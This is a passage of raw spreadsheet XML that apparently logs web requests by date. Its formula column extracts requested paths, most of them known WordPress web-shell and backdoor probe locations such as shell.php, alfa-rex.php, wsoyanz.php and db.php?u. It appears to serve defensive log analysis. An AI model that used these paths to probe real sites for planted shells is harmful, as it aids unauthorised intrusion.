      <c r="A4274" s="1">
        <v>45194.997754629629</v>
      </c>
      <c r="B4274" t="s">
        <v>1409</v>
      </c>
      <c r="C4274" t="s">
        <v>1277</v>
      </c>
      <c r="D4274" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/plugins/revslider/includes/external/page/</v>
      </c>
      <c r="E4274" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4275" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4275" s="1">
        <v>45194.99763888889</v>
      </c>
      <c r="B4275" t="s">
        <v>1409</v>
      </c>
      <c r="C4275" t="s">
        <v>1277</v>
      </c>
      <c r="D4275" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/plugins/revslider/includes/external/page/</v>
      </c>
      <c r="E4275" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4276" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4276" s="1">
        <v>45194.997534722221</v>
      </c>
      <c r="B4276" t="s">
        <v>1409</v>
      </c>
      <c r="C4276" t="s">
        <v>1484</v>
      </c>
      <c r="D4276" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/themes/twenty/twenty.php</v>
      </c>
      <c r="E4276" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4277" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4277" s="1">
        <v>45194.997442129628</v>
      </c>
      <c r="B4277" t="s">
        <v>1409</v>
      </c>
      <c r="C4277" t="s">
        <v>1484</v>
      </c>
      <c r="D4277" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/themes/twenty/twenty.php</v>
      </c>
      <c r="E4277" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4278" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4278" s="1">
        <v>45194.931481481479</v>
      </c>
      <c r="B4278" t="s">
        <v>1359</v>
      </c>
      <c r="C4278" t="s">
        <v>351</v>
      </c>
      <c r="D4278" t="str">
        <f t="shared" si="66"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E4278" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4279" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4279" s="1">
        <v>45194.931469907409</v>
      </c>
      <c r="B4279" t="s">
        <v>1359</v>
      </c>
      <c r="C4279" t="s">
        <v>352</v>
      </c>
      <c r="D4279" t="str">
        <f t="shared" si="66"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E4279" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4280" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4280" s="1">
        <v>45194.931446759256</v>
      </c>
      <c r="B4280" t="s">
        <v>1359</v>
      </c>
      <c r="C4280" t="s">
        <v>402</v>
      </c>
      <c r="D4280" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E4280" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4281" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4281" s="1">
        <v>45194.931423611109</v>
      </c>
      <c r="B4281" t="s">
        <v>1359</v>
      </c>
      <c r="C4281" t="s">
        <v>353</v>
      </c>
      <c r="D4281" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4281" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4282" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4282" s="1">
        <v>45194.88076388889</v>
      </c>
      <c r="B4282" t="s">
        <v>1295</v>
      </c>
      <c r="C4282" t="s">
        <v>356</v>
      </c>
      <c r="D4282" t="str">
        <f t="shared" si="66"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E4282" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4283" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4283" s="1">
        <v>45194.880682870367</v>
      </c>
      <c r="B4283" t="s">
        <v>1295</v>
      </c>
      <c r="C4283" t="s">
        <v>357</v>
      </c>
      <c r="D4283" t="str">
        <f t="shared" si="66"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E4283" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4284" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4284" s="1">
        <v>45194.880590277775</v>
      </c>
      <c r="B4284" t="s">
        <v>1295</v>
      </c>
      <c r="C4284" t="s">
        <v>523</v>
      </c>
      <c r="D4284" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E4284" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4285" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4285" s="1">
        <v>45194.880497685182</v>
      </c>
      <c r="B4285" t="s">
        <v>1295</v>
      </c>
      <c r="C4285" t="s">
        <v>358</v>
      </c>
      <c r="D4285" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4285" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4286" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4286" s="1">
        <v>45194.74628472222</v>
      </c>
      <c r="B4286" t="s">
        <v>1302</v>
      </c>
      <c r="C4286" t="s">
        <v>351</v>
      </c>
      <c r="D4286" t="str">
        <f t="shared" si="66"/>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E4286" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4287" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4287" s="1">
        <v>45194.746145833335</v>
      </c>
      <c r="B4287" t="s">
        <v>1302</v>
      </c>
      <c r="C4287" t="s">
        <v>352</v>
      </c>
      <c r="D4287" t="str">
        <f t="shared" si="66"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E4287" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4288" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4288" s="1">
        <v>45194.746087962965</v>
      </c>
      <c r="B4288" t="s">
        <v>1302</v>
      </c>
      <c r="C4288" t="s">
        <v>402</v>
      </c>
      <c r="D4288" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E4288" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4289" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4289" s="1">
        <v>45194.74596064815</v>
      </c>
      <c r="B4289" t="s">
        <v>1302</v>
      </c>
      <c r="C4289" t="s">
        <v>353</v>
      </c>
      <c r="D4289" t="str">
        <f t="shared" si="66"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4289" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4290" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4290" s="1">
        <v>45194.512280092589</v>
      </c>
      <c r="B4290" t="s">
        <v>1302</v>
      </c>
      <c r="C4290" t="s">
        <v>351</v>
      </c>
      <c r="D4290" t="str">
        <f t="shared" ref="D4290:D4353" si="67">MID(C4290,FIND("#", SUBSTITUTE(C4290, "/", "#", 3))+1,LEN(C4290)-FIND("#", SUBSTITUTE(C4290, "/", "#", 3))+1)</f>
        <v>wp-includes/widgets/include.php</v>
      </c>
      <c r="E4290" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4291" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4291" s="1">
        <v>45194.512037037035</v>
      </c>
      <c r="B4291" t="s">
        <v>1302</v>
      </c>
      <c r="C4291" t="s">
        <v>352</v>
      </c>
      <c r="D4291" t="str">
        <f t="shared" si="67"/>
        <v>wp-includes/images/include.php</v>
      </c>
      <c r="E4291" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4292" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4292" s="1">
        <v>45194.511874999997</v>
      </c>
      <c r="B4292" t="s">
        <v>1302</v>
      </c>
      <c r="C4292" t="s">
        <v>402</v>
      </c>
      <c r="D4292" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/WordPressCore/include.php</v>
      </c>
      <c r="E4292" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4293" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4293" s="1">
        <v>45194.511597222219</v>
      </c>
      <c r="B4293" t="s">
        <v>1302</v>
      </c>
      <c r="C4293" t="s">
        <v>353</v>
      </c>
      <c r="D4293" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4293" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4294" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4294" s="1">
        <v>45194.496782407405</v>
      </c>
      <c r="B4294" t="s">
        <v>1485</v>
      </c>
      <c r="C4294" t="s">
        <v>353</v>
      </c>
      <c r="D4294" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4294" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4295" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4295" s="1">
        <v>45194.068796296298</v>
      </c>
      <c r="B4295" t="s">
        <v>1486</v>
      </c>
      <c r="C4295" t="s">
        <v>1078</v>
      </c>
      <c r="D4295" t="str">
        <f t="shared" si="67"/>
        <v>view.php?name=Asal%20Persian</v>
      </c>
      <c r="E4295" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="4296" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4296" s="1">
        <v>45193.806944444441</v>
      </c>
      <c r="B4296" t="s">
        <v>1487</v>
      </c>
      <c r="C4296" t="s">
        <v>43</v>
      </c>
      <c r="D4296" t="str">
        <f t="shared" si="67"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4296" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4297" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4297" s="1">
        <v>45193.194340277776</v>
      </c>
      <c r="B4297" t="s">
        <v>1488</v>
      </c>
      <c r="C4297" t="s">
        <v>1489</v>
      </c>
      <c r="D4297" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/envato-market/inc/class-envato-market-api.php</v>
      </c>
      <c r="E4297" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4298" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4298" s="1">
        <v>45193.194305555553</v>
      </c>
      <c r="B4298" t="s">
        <v>1488</v>
      </c>
      <c r="C4298" t="s">
        <v>1490</v>
      </c>
      <c r="D4298" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/images/install.php</v>
      </c>
      <c r="E4298" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4299" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4299" s="1">
        <v>45193.194293981483</v>
      </c>
      <c r="B4299" t="s">
        <v>1488</v>
      </c>
      <c r="C4299" t="s">
        <v>1491</v>
      </c>
      <c r="D4299" t="str">
        <f t="shared" si="67"/>
        <v>css/install.php</v>
      </c>
      <c r="E4299" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4300" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4300" s="1">
        <v>45193.19427083333</v>
      </c>
      <c r="B4300" t="s">
        <v>1488</v>
      </c>
      <c r="C4300" t="s">
        <v>1149</v>
      </c>
      <c r="D4300" t="str">
        <f t="shared" si="67"/>
        <v>.well-known/acme-challenge/install.php</v>
      </c>
      <c r="E4300" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4301" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4301" s="1">
        <v>45193.194247685184</v>
      </c>
      <c r="B4301" t="s">
        <v>1488</v>
      </c>
      <c r="C4301" t="s">
        <v>1492</v>
      </c>
      <c r="D4301" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/install.php</v>
      </c>
      <c r="E4301" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4302" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4302" s="1">
        <v>45193.194236111114</v>
      </c>
      <c r="B4302" t="s">
        <v>1488</v>
      </c>
      <c r="C4302" t="s">
        <v>1493</v>
      </c>
      <c r="D4302" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/install.php</v>
      </c>
      <c r="E4302" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4303" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4303" s="1">
        <v>45193.194212962961</v>
      </c>
      <c r="B4303" t="s">
        <v>1488</v>
      </c>
      <c r="C4303" t="s">
        <v>1494</v>
      </c>
      <c r="D4303" t="str">
        <f t="shared" si="67"/>
        <v>install.php</v>
      </c>
      <c r="E4303" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4304" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4304" s="1">
        <v>45193.194201388891</v>
      </c>
      <c r="B4304" t="s">
        <v>1488</v>
      </c>
      <c r="C4304" t="s">
        <v>1495</v>
      </c>
      <c r="D4304" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/patior/</v>
      </c>
      <c r="E4304" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4305" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4305" s="1">
        <v>45193.194178240738</v>
      </c>
      <c r="B4305" t="s">
        <v>1488</v>
      </c>
      <c r="C4305" t="s">
        <v>390</v>
      </c>
      <c r="D4305" t="str">
        <f t="shared" si="67"/>
        <v>dropdown.php</v>
      </c>
      <c r="E4305" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4306" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4306" s="1">
        <v>45193.194155092591</v>
      </c>
      <c r="B4306" t="s">
        <v>1488</v>
      </c>
      <c r="C4306" t="s">
        <v>1496</v>
      </c>
      <c r="D4306" t="str">
        <f t="shared" si="67"/>
        <v>.well-known/admin.php</v>
      </c>
      <c r="E4306" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4307" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4307" s="1">
        <v>45193.194131944445</v>
      </c>
      <c r="B4307" t="s">
        <v>1488</v>
      </c>
      <c r="C4307" t="s">
        <v>959</v>
      </c>
      <c r="D4307" t="str">
        <f t="shared" si="67"/>
        <v>radio.php</v>
      </c>
      <c r="E4307" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4308" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4308" s="1">
        <v>45193.194108796299</v>
      </c>
      <c r="B4308" t="s">
        <v>1488</v>
      </c>
      <c r="C4308" t="s">
        <v>566</v>
      </c>
      <c r="D4308" t="str">
        <f t="shared" si="67"/>
        <v>cjfuns.php</v>
      </c>
      <c r="E4308" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4309" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4309" s="1">
        <v>45193.194074074076</v>
      </c>
      <c r="B4309" t="s">
        <v>1488</v>
      </c>
      <c r="C4309" t="s">
        <v>1142</v>
      </c>
      <c r="D4309" t="str">
        <f t="shared" si="67"/>
        <v>.well-known/acme-challenge/xmrlpc.php</v>
      </c>
      <c r="E4309" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4310" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4310" s="1">
        <v>45193.194050925929</v>
      </c>
      <c r="B4310" t="s">
        <v>1488</v>
      </c>
      <c r="C4310" t="s">
        <v>1098</v>
      </c>
      <c r="D4310" t="str">
        <f t="shared" si="67"/>
        <v>.well-known/acme-challenge/cloud.php</v>
      </c>
      <c r="E4310" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4311" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4311" s="1">
        <v>45193.194004629629</v>
      </c>
      <c r="B4311" t="s">
        <v>1488</v>
      </c>
      <c r="C4311" t="s">
        <v>1497</v>
      </c>
      <c r="D4311" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/seoo/wsoyanz.php</v>
      </c>
      <c r="E4311" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4312" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4312" s="1">
        <v>45193.193981481483</v>
      </c>
      <c r="B4312" t="s">
        <v>1488</v>
      </c>
      <c r="C4312" t="s">
        <v>1498</v>
      </c>
      <c r="D4312" t="str">
        <f t="shared" si="67"/>
        <v>alfa-rex.php</v>
      </c>
      <c r="E4312" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4313" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4313" s="1">
        <v>45193.193958333337</v>
      </c>
      <c r="B4313" t="s">
        <v>1488</v>
      </c>
      <c r="C4313" t="s">
        <v>889</v>
      </c>
      <c r="D4313" t="str">
        <f t="shared" si="67"/>
        <v>shell.php</v>
      </c>
      <c r="E4313" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4314" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4314" s="1">
        <v>45193.193935185183</v>
      </c>
      <c r="B4314" t="s">
        <v>1488</v>
      </c>
      <c r="C4314" t="s">
        <v>1499</v>
      </c>
      <c r="D4314" t="str">
        <f t="shared" si="67"/>
        <v>wp-info.php</v>
      </c>
      <c r="E4314" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4315" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4315" s="1">
        <v>45193.193923611114</v>
      </c>
      <c r="B4315" t="s">
        <v>1488</v>
      </c>
      <c r="C4315" t="s">
        <v>1500</v>
      </c>
      <c r="D4315" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647</v>
      </c>
      <c r="E4315" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4316" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4316" s="1">
        <v>45193.193888888891</v>
      </c>
      <c r="B4316" t="s">
        <v>1488</v>
      </c>
      <c r="C4316" t="s">
        <v>41</v>
      </c>
      <c r="D4316" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4316" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4317" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4317" s="1">
        <v>45193.193877314814</v>
      </c>
      <c r="B4317" t="s">
        <v>1488</v>
      </c>
      <c r="C4317" t="s">
        <v>695</v>
      </c>
      <c r="D4317" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E4317" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4318" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4318" s="1">
        <v>45193.193854166668</v>
      </c>
      <c r="B4318" t="s">
        <v>1488</v>
      </c>
      <c r="C4318" t="s">
        <v>767</v>
      </c>
      <c r="D4318" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/seoplugins/db.php?u</v>
      </c>
      <c r="E4318" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4319" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4319" s="1">
        <v>45193.193842592591</v>
      </c>
      <c r="B4319" t="s">
        <v>1488</v>
      </c>
      <c r="C4319" t="s">
        <v>694</v>
      </c>
      <c r="D4319" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/seoplugins/mar.php</v>
      </c>
      <c r="E4319" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4320" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4320" s="1">
        <v>45193.193819444445</v>
      </c>
      <c r="B4320" t="s">
        <v>1488</v>
      </c>
      <c r="C4320" t="s">
        <v>1501</v>
      </c>
      <c r="D4320" t="str">
        <f t="shared" si="67"/>
        <v>ccx/</v>
      </c>
      <c r="E4320" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4321" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4321" s="1">
        <v>45193.193796296298</v>
      </c>
      <c r="B4321" t="s">
        <v>1488</v>
      </c>
      <c r="C4321" t="s">
        <v>1126</v>
      </c>
      <c r="D4321" t="str">
        <f t="shared" si="67"/>
        <v>repeater.php</v>
      </c>
      <c r="E4321" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4322" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4322" s="1">
        <v>45193.193773148145</v>
      </c>
      <c r="B4322" t="s">
        <v>1488</v>
      </c>
      <c r="C4322" t="s">
        <v>1502</v>
      </c>
      <c r="D4322" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/css/colors/coffee/about.php</v>
      </c>
      <c r="E4322" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4323" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4323" s="1">
        <v>45193.193738425929</v>
      </c>
      <c r="B4323" t="s">
        <v>1488</v>
      </c>
      <c r="C4323" t="s">
        <v>1503</v>
      </c>
      <c r="D4323" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/css/colors/blue/about.php</v>
      </c>
      <c r="E4323" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4324" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4324" s="1">
        <v>45193.193715277775</v>
      </c>
      <c r="B4324" t="s">
        <v>1488</v>
      </c>
      <c r="C4324" t="s">
        <v>1504</v>
      </c>
      <c r="D4324" t="str">
        <f t="shared" si="67"/>
        <v>wp-includes/blocks/table/int/tmpl/</v>
      </c>
      <c r="E4324" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4325" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4325" s="1">
        <v>45193.193703703706</v>
      </c>
      <c r="B4325" t="s">
        <v>1488</v>
      </c>
      <c r="C4325" t="s">
        <v>1350</v>
      </c>
      <c r="D4325" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/plugins/linkpreview/db.php?u</v>
      </c>
      <c r="E4325" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4326" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4326" s="1">
        <v>45193.193668981483</v>
      </c>
      <c r="B4326" t="s">
        <v>1488</v>
      </c>
      <c r="C4326" t="s">
        <v>1432</v>
      </c>
      <c r="D4326" t="str">
        <f t="shared" si="67"/>
        <v>wp-content/themes/pridmag/db.php?u</v>
      </c>
      <c r="E4326" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4327" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4327" s="1">
        <v>45192.91201388889</v>
      </c>
      <c r="B4327" t="s">
        <v>1505</v>
      </c>
      <c r="C4327" t="s">
        <v>5</v>
      </c>
      <c r="D4327" t="str">
        <f t="shared" si="67"/>
        <v/>
      </c>
      <c r="E4327" t="s">
        <v>1506</v>
      </c>
    </row>
    <row r="4328" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4328" s="1">
        <v>45192.771990740737</v>
      </c>
      <c r="B4328" t="s">
        <v>1507</v>
      </c>
      <c r="C4328" t="s">
        <v>1508</v>
      </c>
      <c r="D4328" t="str">
        <f t="shared" si="67"/>
        <v>cgi-bin/moon.php</v>
      </c>
      <c r="E4328" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4329" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4329" s="1">
        <v>45192.771956018521</v>
      </c>
      <c r="B4329" t="s">
        <v>1507</v>
      </c>
      <c r="C4329" t="s">
        <v>1508</v>
      </c>
      <c r="D4329" t="str">
        <f t="shared" si="67"/>
        <v>cgi-bin/moon.php</v>
      </c>
      <c r="E4329" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4330" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4330" s="1">
        <v>45192.771886574075</v>
      </c>
      <c r="B4330" t="s">
        <v>1507</v>
      </c>
      <c r="C4330" t="s">
        <v>1509</v>
      </c>
      <c r="D4330" t="str">
        <f t="shared" si="67"/>
        <v>.well-known/acme-challenge/my1.php</v>
      </c>
      <c r="E4330" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4331" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4331" s="1">
        <v>45192.771828703706</v>
      </c>
      <c r="B4331" t="s">
        <v>1507</v>
      </c>
      <c r="C4331" t="s">
        <v>1509</v>
      </c>
      <c r="D4331" t="str">
        <f t="shared" si="67"/>
        <v>.well-known/acme-challenge/my1.php</v>
      </c>
      <c r="E4331" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4332" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4332" s="1">
        <v>45192.771736111114</v>
      </c>
      <c r="B4332" t="s">
        <v>1507</v>
      </c>
      <c r="C4332" t="s">
        <v>1510</v>
      </c>
      <c r="D4332" t="str">
        <f t="shared" si="67"/>
        <v>cgi-bin/my1.php</v>
      </c>
      <c r="E4332" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4333" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4333" s="1">
        <v>45192.771678240744</v>
      </c>
      <c r="B4333" t="s">
        <v>1507</v>
      </c>
      <c r="C4333" t="s">
        <v>1510</v>
      </c>
      <c r="D4333" t="str">
        <f t="shared" si="67"/>
        <v>cgi-bin/my1.php</v>
      </c>
      <c r="E4333" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4334" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4334" s="1">
        <v>45192.771620370368</v>
      </c>
      <c r="B4334" t="s">
        <v>1507</v>
      </c>
      <c r="C4334" t="s">
        <v>1511</v>
      </c>
      <c r="D4334" t="str">
        <f t="shared" si="67"/>
        <v>my1.php</v>
      </c>
      <c r="E4334" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4335" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4335" s="1">
        <v>45192.771585648145</v>
      </c>
      <c r="B4335" t="s">
        <v>1507</v>
      </c>
      <c r="C4335" t="s">
        <v>1511</v>
      </c>
      <c r="D4335" t="str">
        <f t="shared" si="67"/>
        <v>my1.php</v>
      </c>
      <c r="E4335" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4336" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4336" s="1">
        <v>45192.771296296298</v>
      </c>
      <c r="B4336" t="s">
        <v>1507</v>
      </c>
      <c r="C4336" t="s">
        <v>1512</v>
      </c>
      <c r="D4336" t="str">
        <f t="shared" si="67"/>
        <v>wp-includes/Requests/Cookie/my1.php</v>
      </c>
      <c r="E4336" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4337" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4337" s="1">
        <v>45192.771261574075</v>
      </c>
      <c r="B4337" t="s">
        <v>1507</v>
      </c>
      <c r="C4337" t="s">
        <v>1512</v>
      </c>
      <c r="D4337" t="str">
        <f t="shared" si="67"/>
        <v>wp-includes/Requests/Cookie/my1.php</v>
      </c>
      <c r="E4337" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4338" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4338" s="1">
        <v>45192.771192129629</v>
      </c>
      <c r="B4338" t="s">
        <v>1507</v>
      </c>
      <c r="C4338" t="s">
        <v>1513</v>
      </c>
      <c r="D4338" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/images/my1.php</v>
      </c>
      <c r="E4338" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4339" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4339" s="1">
        <v>45192.771111111113</v>
      </c>
      <c r="B4339" t="s">
        <v>1507</v>
      </c>
      <c r="C4339" t="s">
        <v>1513</v>
      </c>
      <c r="D4339" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/images/my1.php</v>
      </c>
      <c r="E4339" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4340" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4340" s="1">
        <v>45192.770833333336</v>
      </c>
      <c r="B4340" t="s">
        <v>1507</v>
      </c>
      <c r="C4340" t="s">
        <v>1514</v>
      </c>
      <c r="D4340" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/maint/moon.php</v>
      </c>
      <c r="E4340" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4341" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4341" s="1">
        <v>45192.770798611113</v>
      </c>
      <c r="B4341" t="s">
        <v>1507</v>
      </c>
      <c r="C4341" t="s">
        <v>1514</v>
      </c>
      <c r="D4341" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/maint/moon.php</v>
      </c>
      <c r="E4341" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4342" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4342" s="1">
        <v>45192.770729166667</v>
      </c>
      <c r="B4342" t="s">
        <v>1507</v>
      </c>
      <c r="C4342" t="s">
        <v>1515</v>
      </c>
      <c r="D4342" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/js/widgets/moon.php</v>
      </c>
      <c r="E4342" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4343" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4343" s="1">
        <v>45192.770694444444</v>
      </c>
      <c r="B4343" t="s">
        <v>1507</v>
      </c>
      <c r="C4343" t="s">
        <v>1515</v>
      </c>
      <c r="D4343" t="str">
        <f t="shared" si="67"/>
        <v>wp-admin/js/widgets/moon.php</v>
      </c>
      <c r="E4343" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4344" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4344" s="1">
        <v>45192.770601851851</v>
      </c>
      <c r="B4344" t="s">
        <v>1507</v>
      </c>
      <c r="C4344" t="s">
        <v>1144</v>
      </c>
      <c r="D4344" t="str">
